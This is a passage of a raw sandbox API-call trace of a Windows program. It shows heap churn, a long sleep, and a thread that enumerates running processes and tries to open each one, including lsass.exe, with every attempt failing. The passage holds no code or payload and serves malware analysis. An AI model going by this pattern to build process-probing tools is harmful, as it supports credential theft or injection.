Size=0x88) returned 0x6825ba8 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.825] GetProcessHeap () returned 0xe30000 [0144.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.826] GetProcessHeap () returned 0xe30000 [0144.826] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.826] GetProcessHeap () returned 0xe30000 [0144.826] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.826] GetProcessHeap () returned 0xe30000 [0144.826] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.826] GetProcessHeap () returned 0xe30000 [0144.826] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.826] GetProcessHeap () returned 0xe30000 [0144.826] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.826] GetProcessHeap () returned 0xe30000 [0144.826] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.826] GetProcessHeap () returned 0xe30000 [0144.826] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0144.826] GetProcessHeap () returned 0xe30000 [0144.826] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0144.826] GetProcessHeap () returned 0xe30000 [0144.826] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.826] GetProcessHeap () returned 0xe30000 [0144.826] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.827] GetProcessHeap () returned 0xe30000 [0144.827] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0144.827] GetProcessHeap () returned 0xe30000 [0144.827] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0144.827] GetProcessHeap () returned 0xe30000 [0144.827] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2be50 | out: hHeap=0xe30000) returned 1 [0144.827] GetProcessHeap () returned 0xe30000 [0144.827] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0144.827] Sleep (dwMilliseconds=0xea60) Thread: id = 58 os_tid = 0x1360 [0101.394] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa84 [0101.405] Process32FirstW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.405] GetCurrentProcessId () returned 0xf00 [0101.405] GetCurrentProcess () returned 0xffffffff [0101.405] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.406] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0101.406] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x69, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.406] GetCurrentProcessId () returned 0xf00 [0101.406] GetCurrentProcess () returned 0xffffffff [0101.406] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.406] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0101.406] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.407] GetCurrentProcessId () returned 0xf00 [0101.407] GetCurrentProcess () returned 0xffffffff [0101.407] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.407] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0101.407] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.408] GetCurrentProcessId () returned 0xf00 [0101.408] GetCurrentProcess () returned 0xffffffff [0101.408] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.408] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x198) returned 0x0 [0101.408] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.409] GetCurrentProcessId () returned 0xf00 [0101.409] GetCurrentProcess () returned 0xffffffff [0101.409] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.409] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0101.409] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.409] GetCurrentProcessId () returned 0xf00 [0101.409] GetCurrentProcess () returned 0xffffffff [0101.409] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.409] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0101.410] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.410] GetCurrentProcessId () returned 0xf00 [0101.410] GetCurrentProcess () returned 0xffffffff [0101.410] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.410] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x220) returned 0x0 [0101.410] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.411] GetCurrentProcessId () returned 0xf00 [0101.411] GetCurrentProcess () returned 0xffffffff [0101.411] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.411] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0101.411] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.412] GetCurrentProcessId () returned 0xf00 [0101.412] GetCurrentProcess () returned 0xffffffff [0101.412] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.412] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x244) returned 0x0 [0101.412] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.412] GetCurrentProcessId () returned 0xf00 [0101.412] GetCurrentProcess () returned 0xffffffff [0101.413] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.413] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2a4) returned 0x0 [0101.413] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0101.413] GetCurrentProcessId () returned 0xf00 [0101.413] GetCurrentProcess () returned 0xffffffff [0101.413] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.413] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0101.413] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0101.414] GetCurrentProcessId () returned 0xf00 [0101.414] GetCurrentProcess () returned 0xffffffff [0101.414] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.414] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2b4) returned 0x0 [0101.414] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.415] GetCurrentProcessId () returned 0xf00 [0101.415] GetCurrentProcess () returned 0xffffffff [0101.415] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.415] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0101.415] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.416] GetCurrentProcessId () returned 0xf00 [0101.416] GetCurrentProcess () returned 0xffffffff [0101.416] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.416] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0101.416] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x63, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.416] GetCurrentProcessId () returned 0xf00 [0101.416] GetCurrentProcess () returned 0xffffffff [0101.416] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.417] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0101.417] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.417] GetCurrentProcessId () returned 0xf00 [0101.417] GetCurrentProcess () returned 0xffffffff [0101.417] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.417] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0 [0101.417] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.418] GetCurrentProcessId () returned 0xf00 [0101.418] GetCurrentProcess () returned 0xffffffff [0101.418] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.418] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3d8) returned 0x0 [0101.418] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.419] GetCurrentProcessId () returned 0xf00 [0101.419] GetCurrentProcess () returned 0xffffffff [0101.419] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.419] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0101.419] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.419] GetCurrentProcessId () returned 0xf00 [0101.419] GetCurrentProcess () returned 0xffffffff [0101.419] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.419] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x350) returned 0x0 [0101.419] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.420] GetCurrentProcessId () returned 0xf00 [0101.420] GetCurrentProcess () returned 0xffffffff [0101.420] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.420] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x434) returned 0x0 [0101.420] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.420] GetCurrentProcessId () returned 0xf00 [0101.420] GetCurrentProcess () returned 0xffffffff [0101.420] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.421] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x554) returned 0x0 [0101.421] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.421] GetCurrentProcessId () returned 0xf00 [0101.421] GetCurrentProcess () returned 0xffffffff [0101.421] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.421] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x590) returned 0x0 [0101.421] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.422] GetCurrentProcessId () returned 0xf00 [0101.422] GetCurrentProcess () returned 0xffffffff [0101.422] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.422] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x598) returned 0x0 [0101.422] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.422] GetCurrentProcessId () returned 0xf00 [0101.422] GetCurrentProcess () returned 0xffffffff [0101.422] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.422] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5b0) returned 0x0 [0101.422] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.423] GetCurrentProcessId () returned 0xf00 [0101.423] GetCurrentProcess () returned 0xffffffff [0101.423] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.423] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5e8) returned 0x0 [0101.423] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.423] GetCurrentProcessId () returned 0xf00 [0101.423] GetCurrentProcess () returned 0xffffffff [0101.423] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.423] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x69c) returned 0x0 [0101.423] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.424] GetCurrentProcessId () returned 0xf00 [0101.424] GetCurrentProcess () returned 0xffffffff [0101.424] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.424] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6bc) returned 0x0 [0101.424] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0101.424] GetCurrentProcessId () returned 0xf00 [0101.425] GetCurrentProcess () returned 0xffffffff [0101.425] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, 